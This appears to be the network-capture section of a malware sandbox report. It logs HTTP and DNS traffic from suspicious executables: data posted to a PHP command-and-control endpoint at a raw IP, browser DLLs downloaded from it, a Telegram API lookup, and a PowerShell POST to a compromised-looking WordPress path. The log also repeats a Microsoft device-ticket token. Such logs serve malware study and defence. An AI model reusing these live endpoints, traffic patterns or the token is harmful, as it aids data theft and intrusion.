                                                                                              MSA_DeviceTicket: t=EwCYA1N5BAAURwgwBpuLliVWV80BZoa1ueVtl08AAbayyqCpHWDuAzsBwW2NcIuAlrQAKTC/jcAZ3KuOlTOvEFYNc1M7RvDrnG3QeMoe1M2JJKc4cLpzHaBKP4qF+f7Ll6a0rsFc7fbZ+7wFcH9JFFfK+wui0u2ozfDyMzY5YNgIcIWeBmEH6qTPF3qG+mpv4nl/QixuvZSz8Et0Yjosnbrw4SAKieZy8fEjyzVX1Yh1rIq5lSuoP8lbzElKcJb5Jm47JWHMHyZamKt7YqTfTU5lz4m/2NnD4wIxeA9sYReJciiMiFOcGQORIs08xKtusPy81IEttxMZxZPKW+B9kFCtmjs3mQVu6x2sDtXEMN0ITiCiWCYplHKcQMSBkEQQZgAAEDBY2+941QjvDl7cW56W9Z5gAoNphIvc0X16whul1AAtA0CUCD53y7AMnYHbD1hiHak2ib5JYnltgQVZ5DHDREVXveU/AnaXJNd4AzqmBo2JcT++qMhrPF+XsWlYKQNAbeaCnZr4EEyhaO7kaSsFyXbo+4CcrW3/IXwLDVJ0y8RoC4l2wSV+OjW6tNfZzYDyKOsrPjwnJSouAvZWTAwFb3xHzRKnfcMaL2jU2Z5xg4RZizl1oB93/xxe4iTpbdDRt9/7ZK1OQNGekggm97X1O0+haPnjhylOKsy92g1JjWGzBFH8vNuQIaaJ4bBfZ+TVxMXtfYnj2ZN3deyq+WN40Q7nUFEChCjH+25uV0dc8lBXEpmKhvxCaJftKNzFPmv5NwNjaLp3hTou6LH3xVjMn8dKPDVa5zYjNdb5/w0J2VxgTROSDEnYtWZIBE6lsQDTWbiG7WFeeobqPFnk4hJVd9URFu7LyOSFQG54/RV68XXh5yPgcII3ewQ1WbnQHfaNgw0Hputwp9ygknan3TeyiDWmMVyBNU25WzU8+FgOmRGFhg2JOCtaXQBzn62QM7pqPgbPu0D8337I70OdI1rFyc4X1u1QSUOmntIaP0hBLLQqnkwW7DGuMmJYEkAEcnabhe6M9aXbzmD3hFxm6aEU0YmWsqcmJPnx8ArT6ArsANiKiHfrnKk+LLMxJdFSmAbkMT3Na9+yH18CnTJ770DG0km1clqmllU6n2aLjlYm86jW4S3hRrHBAqnWaJHR1WBUsKaHAsQ/0Cl4YKanTp/Qf9+Bc1sVVQE87c3rpQfEVoIQrt8dJ+X6snwyxQP3V3rXybcZkgI=&p=
                                                                                              Content-Length: 3400
                                                                                              Host: nw-umwatson.events.data.microsoft.com
                                                                                              Response
                                                                                              HTTP/1.1 200 200 OK
                                                                                              Content-Length: 638
                                                                                              Content-Type: text/xml
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Access-Control-Allow-Methods: POST
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Date: Thu, 20 Feb 2025 00:34:21 GMT
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://nw-umwatson.events.data.microsoft.com/Telemetry.Request
                                                                                              msedge.exe
                                                                                              Remote address:
                                                                                              20.42.73.29:443
                                                                                              Request
                                                                                              POST /Telemetry.Request HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/xml
                                                                                              User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
                                                                                              MSA_DeviceTicket: t=EwCYA1N5BAAURwgwBpuLliVWV80BZoa1ueVtl08AAbayyqCpHWDuAzsBwW2NcIuAlrQAKTC/jcAZ3KuOlTOvEFYNc1M7RvDrnG3QeMoe1M2JJKc4cLpzHaBKP4qF+f7Ll6a0rsFc7fbZ+7wFcH9JFFfK+wui0u2ozfDyMzY5YNgIcIWeBmEH6qTPF3qG+mpv4nl/QixuvZSz8Et0Yjosnbrw4SAKieZy8fEjyzVX1Yh1rIq5lSuoP8lbzElKcJb5Jm47JWHMHyZamKt7YqTfTU5lz4m/2NnD4wIxeA9sYReJciiMiFOcGQORIs08xKtusPy81IEttxMZxZPKW+B9kFCtmjs3mQVu6x2sDtXEMN0ITiCiWCYplHKcQMSBkEQQZgAAEDBY2+941QjvDl7cW56W9Z5gAoNphIvc0X16whul1AAtA0CUCD53y7AMnYHbD1hiHak2ib5JYnltgQVZ5DHDREVXveU/AnaXJNd4AzqmBo2JcT++qMhrPF+XsWlYKQNAbeaCnZr4EEyhaO7kaSsFyXbo+4CcrW3/IXwLDVJ0y8RoC4l2wSV+OjW6tNfZzYDyKOsrPjwnJSouAvZWTAwFb3xHzRKnfcMaL2jU2Z5xg4RZizl1oB93/xxe4iTpbdDRt9/7ZK1OQNGekggm97X1O0+haPnjhylOKsy92g1JjWGzBFH8vNuQIaaJ4bBfZ+TVxMXtfYnj2ZN3deyq+WN40Q7nUFEChCjH+25uV0dc8lBXEpmKhvxCaJftKNzFPmv5NwNjaLp3hTou6LH3xVjMn8dKPDVa5zYjNdb5/w0J2VxgTROSDEnYtWZIBE6lsQDTWbiG7WFeeobqPFnk4hJVd9URFu7LyOSFQG54/RV68XXh5yPgcII3ewQ1WbnQHfaNgw0Hputwp9ygknan3TeyiDWmMVyBNU25WzU8+FgOmRGFhg2JOCtaXQBzn62QM7pqPgbPu0D8337I70OdI1rFyc4X1u1QSUOmntIaP0hBLLQqnkwW7DGuMmJYEkAEcnabhe6M9aXbzmD3hFxm6aEU0YmWsqcmJPnx8ArT6ArsANiKiHfrnKk+LLMxJdFSmAbkMT3Na9+yH18CnTJ770DG0km1clqmllU6n2aLjlYm86jW4S3hRrHBAqnWaJHR1WBUsKaHAsQ/0Cl4YKanTp/Qf9+Bc1sVVQE87c3rpQfEVoIQrt8dJ+X6snwyxQP3V3rXybcZkgI=&p=
                                                                                              Content-Length: 3400
                                                                                              Host: nw-umwatson.events.data.microsoft.com
                                                                                              Response
                                                                                              HTTP/1.1 200 200 OK
                                                                                              Content-Length: 638
                                                                                              Content-Type: text/xml
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Access-Control-Allow-Methods: POST
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Date: Thu, 20 Feb 2025 00:34:21 GMT
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://nw-umwatson.events.data.microsoft.com/Telemetry.Request
                                                                                              msedge.exe
                                                                                              Remote address:
                                                                                              20.42.73.29:443
                                                                                              Request
                                                                                              POST /Telemetry.Request HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/xml
                                                                                              User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
                                                                                              MSA_DeviceTicket: t=EwCYA1N5BAAURwgwBpuLliVWV80BZoa1ueVtl08AAbayyqCpHWDuAzsBwW2NcIuAlrQAKTC/jcAZ3KuOlTOvEFYNc1M7RvDrnG3QeMoe1M2JJKc4cLpzHaBKP4qF+f7Ll6a0rsFc7fbZ+7wFcH9JFFfK+wui0u2ozfDyMzY5YNgIcIWeBmEH6qTPF3qG+mpv4nl/QixuvZSz8Et0Yjosnbrw4SAKieZy8fEjyzVX1Yh1rIq5lSuoP8lbzElKcJb5Jm47JWHMHyZamKt7YqTfTU5lz4m/2NnD4wIxeA9sYReJciiMiFOcGQORIs08xKtusPy81IEttxMZxZPKW+B9kFCtmjs3mQVu6x2sDtXEMN0ITiCiWCYplHKcQMSBkEQQZgAAEDBY2+941QjvDl7cW56W9Z5gAoNphIvc0X16whul1AAtA0CUCD53y7AMnYHbD1hiHak2ib5JYnltgQVZ5DHDREVXveU/AnaXJNd4AzqmBo2JcT++qMhrPF+XsWlYKQNAbeaCnZr4EEyhaO7kaSsFyXbo+4CcrW3/IXwLDVJ0y8RoC4l2wSV+OjW6tNfZzYDyKOsrPjwnJSouAvZWTAwFb3xHzRKnfcMaL2jU2Z5xg4RZizl1oB93/xxe4iTpbdDRt9/7ZK1OQNGekggm97X1O0+haPnjhylOKsy92g1JjWGzBFH8vNuQIaaJ4bBfZ+TVxMXtfYnj2ZN3deyq+WN40Q7nUFEChCjH+25uV0dc8lBXEpmKhvxCaJftKNzFPmv5NwNjaLp3hTou6LH3xVjMn8dKPDVa5zYjNdb5/w0J2VxgTROSDEnYtWZIBE6lsQDTWbiG7WFeeobqPFnk4hJVd9URFu7LyOSFQG54/RV68XXh5yPgcII3ewQ1WbnQHfaNgw0Hputwp9ygknan3TeyiDWmMVyBNU25WzU8+FgOmRGFhg2JOCtaXQBzn62QM7pqPgbPu0D8337I70OdI1rFyc4X1u1QSUOmntIaP0hBLLQqnkwW7DGuMmJYEkAEcnabhe6M9aXbzmD3hFxm6aEU0YmWsqcmJPnx8ArT6ArsANiKiHfrnKk+LLMxJdFSmAbkMT3Na9+yH18CnTJ770DG0km1clqmllU6n2aLjlYm86jW4S3hRrHBAqnWaJHR1WBUsKaHAsQ/0Cl4YKanTp/Qf9+Bc1sVVQE87c3rpQfEVoIQrt8dJ+X6snwyxQP3V3rXybcZkgI=&p=
                                                                                              Content-Length: 3400
                                                                                              Host: nw-umwatson.events.data.microsoft.com
                                                                                              Response
                                                                                              HTTP/1.1 200 200 OK
                                                                                              Content-Length: 638
                                                                                              Content-Type: text/xml
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Access-Control-Allow-Methods: POST
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Date: Thu, 20 Feb 2025 00:34:21 GMT
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://nw-umwatson.events.data.microsoft.com/Telemetry.Request
                                                                                              msedge.exe
                                                                                              Remote address:
                                                                                              20.42.73.29:443
                                                                                              Request
                                                                                              POST /Telemetry.Request HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/xml
                                                                                              User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
                                                                                              MSA_DeviceTicket: t=EwCYA1N5BAAURwgwBpuLliVWV80BZoa1ueVtl08AAbayyqCpHWDuAzsBwW2NcIuAlrQAKTC/jcAZ3KuOlTOvEFYNc1M7RvDrnG3QeMoe1M2JJKc4cLpzHaBKP4qF+f7Ll6a0rsFc7fbZ+7wFcH9JFFfK+wui0u2ozfDyMzY5YNgIcIWeBmEH6qTPF3qG+mpv4nl/QixuvZSz8Et0Yjosnbrw4SAKieZy8fEjyzVX1Yh1rIq5lSuoP8lbzElKcJb5Jm47JWHMHyZamKt7YqTfTU5lz4m/2NnD4wIxeA9sYReJciiMiFOcGQORIs08xKtusPy81IEttxMZxZPKW+B9kFCtmjs3mQVu6x2sDtXEMN0ITiCiWCYplHKcQMSBkEQQZgAAEDBY2+941QjvDl7cW56W9Z5gAoNphIvc0X16whul1AAtA0CUCD53y7AMnYHbD1hiHak2ib5JYnltgQVZ5DHDREVXveU/AnaXJNd4AzqmBo2JcT++qMhrPF+XsWlYKQNAbeaCnZr4EEyhaO7kaSsFyXbo+4CcrW3/IXwLDVJ0y8RoC4l2wSV+OjW6tNfZzYDyKOsrPjwnJSouAvZWTAwFb3xHzRKnfcMaL2jU2Z5xg4RZizl1oB93/xxe4iTpbdDRt9/7ZK1OQNGekggm97X1O0+haPnjhylOKsy92g1JjWGzBFH8vNuQIaaJ4bBfZ+TVxMXtfYnj2ZN3deyq+WN40Q7nUFEChCjH+25uV0dc8lBXEpmKhvxCaJftKNzFPmv5NwNjaLp3hTou6LH3xVjMn8dKPDVa5zYjNdb5/w0J2VxgTROSDEnYtWZIBE6lsQDTWbiG7WFeeobqPFnk4hJVd9URFu7LyOSFQG54/RV68XXh5yPgcII3ewQ1WbnQHfaNgw0Hputwp9ygknan3TeyiDWmMVyBNU25WzU8+FgOmRGFhg2JOCtaXQBzn62QM7pqPgbPu0D8337I70OdI1rFyc4X1u1QSUOmntIaP0hBLLQqnkwW7DGuMmJYEkAEcnabhe6M9aXbzmD3hFxm6aEU0YmWsqcmJPnx8ArT6ArsANiKiHfrnKk+LLMxJdFSmAbkMT3Na9+yH18CnTJ770DG0km1clqmllU6n2aLjlYm86jW4S3hRrHBAqnWaJHR1WBUsKaHAsQ/0Cl4YKanTp/Qf9+Bc1sVVQE87c3rpQfEVoIQrt8dJ+X6snwyxQP3V3rXybcZkgI=&p=
                                                                                              Content-Length: 3400
                                                                                              Host: nw-umwatson.events.data.microsoft.com
                                                                                              Response
                                                                                              HTTP/1.1 200 200 OK
                                                                                              Content-Length: 638
                                                                                              Content-Type: text/xml
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Access-Control-Allow-Methods: POST
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Date: Thu, 20 Feb 2025 00:34:21 GMT
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://nw-umwatson.events.data.microsoft.com/Telemetry.Request
                                                                                              msedge.exe
                                                                                              Remote address:
                                                                                              20.42.73.29:443
                                                                                              Request
                                                                                              POST /Telemetry.Request HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/xml
                                                                                              User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
                                                                                              MSA_DeviceTicket: t=EwCYA1N5BAAURwgwBpuLliVWV80BZoa1ueVtl08AAbayyqCpHWDuAzsBwW2NcIuAlrQAKTC/jcAZ3KuOlTOvEFYNc1M7RvDrnG3QeMoe1M2JJKc4cLpzHaBKP4qF+f7Ll6a0rsFc7fbZ+7wFcH9JFFfK+wui0u2ozfDyMzY5YNgIcIWeBmEH6qTPF3qG+mpv4nl/QixuvZSz8Et0Yjosnbrw4SAKieZy8fEjyzVX1Yh1rIq5lSuoP8lbzElKcJb5Jm47JWHMHyZamKt7YqTfTU5lz4m/2NnD4wIxeA9sYReJciiMiFOcGQORIs08xKtusPy81IEttxMZxZPKW+B9kFCtmjs3mQVu6x2sDtXEMN0ITiCiWCYplHKcQMSBkEQQZgAAEDBY2+941QjvDl7cW56W9Z5gAoNphIvc0X16whul1AAtA0CUCD53y7AMnYHbD1hiHak2ib5JYnltgQVZ5DHDREVXveU/AnaXJNd4AzqmBo2JcT++qMhrPF+XsWlYKQNAbeaCnZr4EEyhaO7kaSsFyXbo+4CcrW3/IXwLDVJ0y8RoC4l2wSV+OjW6tNfZzYDyKOsrPjwnJSouAvZWTAwFb3xHzRKnfcMaL2jU2Z5xg4RZizl1oB93/xxe4iTpbdDRt9/7ZK1OQNGekggm97X1O0+haPnjhylOKsy92g1JjWGzBFH8vNuQIaaJ4bBfZ+TVxMXtfYnj2ZN3deyq+WN40Q7nUFEChCjH+25uV0dc8lBXEpmKhvxCaJftKNzFPmv5NwNjaLp3hTou6LH3xVjMn8dKPDVa5zYjNdb5/w0J2VxgTROSDEnYtWZIBE6lsQDTWbiG7WFeeobqPFnk4hJVd9URFu7LyOSFQG54/RV68XXh5yPgcII3ewQ1WbnQHfaNgw0Hputwp9ygknan3TeyiDWmMVyBNU25WzU8+FgOmRGFhg2JOCtaXQBzn62QM7pqPgbPu0D8337I70OdI1rFyc4X1u1QSUOmntIaP0hBLLQqnkwW7DGuMmJYEkAEcnabhe6M9aXbzmD3hFxm6aEU0YmWsqcmJPnx8ArT6ArsANiKiHfrnKk+LLMxJdFSmAbkMT3Na9+yH18CnTJ770DG0km1clqmllU6n2aLjlYm86jW4S3hRrHBAqnWaJHR1WBUsKaHAsQ/0Cl4YKanTp/Qf9+Bc1sVVQE87c3rpQfEVoIQrt8dJ+X6snwyxQP3V3rXybcZkgI=&p=
                                                                                              Content-Length: 3400
                                                                                              Host: nw-umwatson.events.data.microsoft.com
                                                                                              Response
                                                                                              HTTP/1.1 200 200 OK
                                                                                              Content-Length: 638
                                                                                              Content-Type: text/xml
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Access-Control-Allow-Methods: POST
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Date: Thu, 20 Feb 2025 00:34:21 GMT
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDB
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 431
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:21 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----AKEGIIJDGHCAKFHJEHCF
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 363
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:22 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=99
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.115/68b591d6548ec281/freebl3.dll
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              GET /68b591d6548ec281/freebl3.dll HTTP/1.1
                                                                                              Host: 185.215.113.115
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:22 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                              ETag: "a7550-5e7e950876500"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 685392
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.115/68b591d6548ec281/mozglue.dll
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              GET /68b591d6548ec281/mozglue.dll HTTP/1.1
                                                                                              Host: 185.215.113.115
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:23 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                              ETag: "94750-5e7e950876500"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 608080
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.115/68b591d6548ec281/msvcp140.dll
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              GET /68b591d6548ec281/msvcp140.dll HTTP/1.1
                                                                                              Host: 185.215.113.115
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:24 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                              ETag: "6dde8-5e7e950876500"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 450024
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.115/68b591d6548ec281/nss3.dll
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              GET /68b591d6548ec281/nss3.dll HTTP/1.1
                                                                                              Host: 185.215.113.115
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:24 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                              ETag: "1f3950-5e7e950876500"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 2046288
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.115/68b591d6548ec281/softokn3.dll
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              GET /68b591d6548ec281/softokn3.dll HTTP/1.1
                                                                                              Host: 185.215.113.115
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:29 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                              ETag: "3ef50-5e7e950876500"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 257872
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.115/68b591d6548ec281/vcruntime140.dll
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1
                                                                                              Host: 185.215.113.115
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:29 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                              ETag: "13bf0-5e7e950876500"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 80880
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----GCFHDAKECFIDGDGDBKJD
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 823
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:29 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=92
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBK
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 1467
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:30 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=91
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDH
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 267
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:31 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Length: 2408
                                                                                              Keep-Alive: timeout=5, max=90
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----HJEBGHIEBFIJKECBKFHD
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 265
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:31 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=89
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----FIDAFIEBFCBKFHIDHIJE
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 363
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:31 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=88
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 272
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:31 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=87
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDH
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 272
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:31 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=86
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-us
                                                                                              DNS
                                                                                              api.telegram.org
                                                                                              trano1221.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              api.telegram.org
                                                                                              IN A
                                                                                              Response
                                                                                              api.telegram.org
                                                                                              IN A
                                                                                              149.154.167.220
                                                                                            • flag-us
                                                                                              DNS
                                                                                              elviscomputer.hu
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              elviscomputer.hu
                                                                                              IN A
                                                                                              Response
                                                                                              elviscomputer.hu
                                                                                              IN A
                                                                                              195.228.152.90
                                                                                            • flag-hu
                                                                                              POST
                                                                                              http://elviscomputer.hu/wp-content/uploads/2021/01/engine.php
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              195.228.152.90:80
                                                                                              Request
                                                                                              POST /wp-content/uploads/2021/01/engine.php HTTP/1.1
                                                                                              Host: elviscomputer.hu
                                                                                              Connection: close
                                                                                              Accept-Encoding: gzip,deflate
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 67
                                                                                              Accept: */*
                                                                                              Accept-Language: *
